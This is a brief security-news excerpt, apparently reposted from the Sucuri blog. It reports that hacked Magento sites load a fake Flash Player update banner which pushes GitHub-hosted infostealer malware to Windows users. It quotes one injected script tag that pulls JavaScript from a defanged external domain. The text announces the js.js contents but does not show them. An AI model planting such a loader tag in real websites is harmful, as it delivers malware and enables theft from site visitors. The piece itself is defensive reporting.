GitHub Hosts Infostealer

GitHub Hosts Infostealer

A few months ago, we reported on how cybercriminals were using GitHub to load a variety of cryptominers on hacked websites. We have now discovered that this same approach is being used to push binary “info stealing” malware to Windows computers.

Infected Magento Sites

Recently, we identified hundreds of infected Magento sites with the following injected script:

<script type=”text/javascript” src=”https://bit.wo[.]tc/js/lib/js.js“></script>

The contents of the js.js file included:

This code creates a hidden div and after a short delay displays a fake Flash Player update banner above the normal site content.

Continue reading GitHub Hosts Infostealer at Sucuri Blog.

Read more: GitHub Hosts Infostealer

Story added 15. March 2018, content source with full text you can find at link above.